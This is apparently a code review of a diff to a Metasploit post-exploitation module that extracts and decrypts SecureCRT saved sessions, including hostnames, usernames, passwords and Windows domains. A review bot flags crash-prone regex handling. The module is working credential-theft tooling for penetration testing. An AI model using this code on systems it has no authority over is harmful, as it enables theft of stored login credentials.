Check that the folder does not exist
@@ -33,6 +33,7 @@ class MetasploitModule < Msf::Post
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PASSPHRASE', [ false, 'The configuration password that was set when SecureCRT was installed, if one was supplied']),
|
||||
OptString.new('SESSION_PATH', [ false, 'Specifies the session directory path for SecureCRT']),
|
||||
]
|
||||
)
|
||||
end
|
||||
@@ -73,13 +74,24 @@ class MetasploitModule < Msf::Post
|
||||
end
|
||||
|
||||
file = try_encode_file(file_contents)
|
||||
protocol = Regexp.compile('S:"Protocol Name"=([^\r\n]*)').match(file) ? Regexp.last_match(1) : nil
|
||||
hostname = Regexp.compile('S:"Hostname"=([^\r\n]*)').match(file) ? Regexp.last_match(1) : nil
|
||||
password = Regexp.compile('S:"Password"=u([0-9a-f]+)').match(file) ? securecrt_crypto(Regexp.last_match(1)) : nil
|
||||
passwordv2 = Regexp.compile('S:"Password V2"=02:([0-9a-f]+)').match(file) ? securecrt_crypto_v2(Regexp.last_match(1)) : nil
|
||||
protocol = Regexp.compile('S:"Protocol Name"=([^\s]+)').match(file) ? Regexp.last_match(1) : nil
|
||||
hostname = Regexp.compile('S:"Hostname"=([^\s]+)').match(file) ? Regexp.last_match(1) : nil
|
||||
decrypted_script = Regexp.compile('S:"Login Script V3"=02:([0-9a-f]+)').match(file) ? securecrt_crypto_v2(Regexp.last_match(1)) : nil
|
||||
if !decrypted_script.nil?
|
||||
username = decrypted_script.match(/login name:\x1F(\S+)\x1F0\x1Fpass/u)[1]
|
||||
password = decrypted_script.match(/password:\x1F([\S]+)\x1F0/u)[1]
|
||||
domain = decrypted_script.match(/Windows Domain:\x1F([\S]+)\x1F/u) ? decrypted_script.match(/Windows Domain:\x1F([\S]+)\x1F/u)[1] : nil
|
||||
if !domain.nil?
|
||||
username = domain + '\\' + username
|
||||
end
|
||||
else
|
||||
password = Regexp.compile('S:"Password"=u([0-9a-f]+)').match(file) ? securecrt_crypto(Regexp.last_match(1)) : nil
|
||||
passwordv2 = Regexp.compile('S:"Password V2"=02:([0-9a-f]+)').match(file) ? securecrt_crypto_v2(Regexp.last_match(1)) : nil
|
||||
username = Regexp.compile('S:"Username"=([^\s]+)').match(file) ? Regexp.last_match(1) : nil
|
||||
end
|
||||
|
||||
port = Regexp.compile("D:\"\\\[#{protocol}\\\] Port\"=([0-9a-f]{8})").match(file) ? Regexp.last_match(1).to_i(16).to_s : nil
|
||||
port = Regexp.compile('D:"Port"=([0-9a-f]{8})').match(file) ? Regexp.last_match(1).to_i(16).to_s : nil if !port
|
||||
username = Regexp.compile('S:"Username"=([^\r\n]*)').match(file) ? Regexp.last_match(1) : nil
|
||||
|
||||
tbl << {
|
||||
file_name: item['name'],
|
||||
@@ -159,9 +171,16 @@ class MetasploitModule < Msf::Post
|
||||
|
||||
def run
|
||||
print_status("Gathering SecureCRT session information from #{sysinfo['Computer']}")
|
||||
parent_key = 'HKEY_CURRENT_USER\\Software\\VanDyke\\SecureCRT'
|
||||
# get session file path
|
||||
securecrt_path = expand_path(registry_getvaldata(parent_key, 'Config Path') + session.fs.file.separator + 'Sessions')
|
||||
securecrt_path = ''
|
||||
if datastore['SESSION_PATH'].to_s.empty?
|
||||
parent_key = 'HKEY_CURRENT_USER\\Software\\VanDyke\\SecureCRT'
|
||||
# get session file path
|
||||
root_path = registry_getvaldata(parent_key, 'Config Path')
|
||||
securecrt_path = expand_path(root_path + session.fs.file.separator + 'Sessions') if !root_path.nil?
|
||||
else
|
||||
securecrt_path = expand_path(datastore['SESSION_PATH'])
|
||||
end
|
||||
|
||||
if securecrt_path.to_s.empty?
|
||||
print_error('Could not find the registry entry for the SecureCRT session path. Ensure that SecureCRT is installed on the target.')
|
||||
else
|
||||
|
||||
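Review bot: In the `if !decrypted_script.nil?` branch of the second hunk, the `username` and `password` assignments index `[1]` directly on the result of `match`. A login script that decrypts but lacks the expected `login name:` or `password:` fields therefore raises NoMethodError on nil, which presumably stops the remaining session files from being processed. The `domain` line already guards against this, at the cost of running the same regex twice. `String#[]` with a capture index returns nil on no match and fits all three, e.g. `username = decrypted_script[/login name:\x1F(\S+)\x1F0\x1Fpass/u, 1]`; the `domain + '\\' + username` concatenation then needs a nil check on `username` as well. Separately, the `port` line interpolates `protocol`, which is read from the session file, into a pattern without `Regexp.escape`; the enclosing method starts and ends outside the hunk.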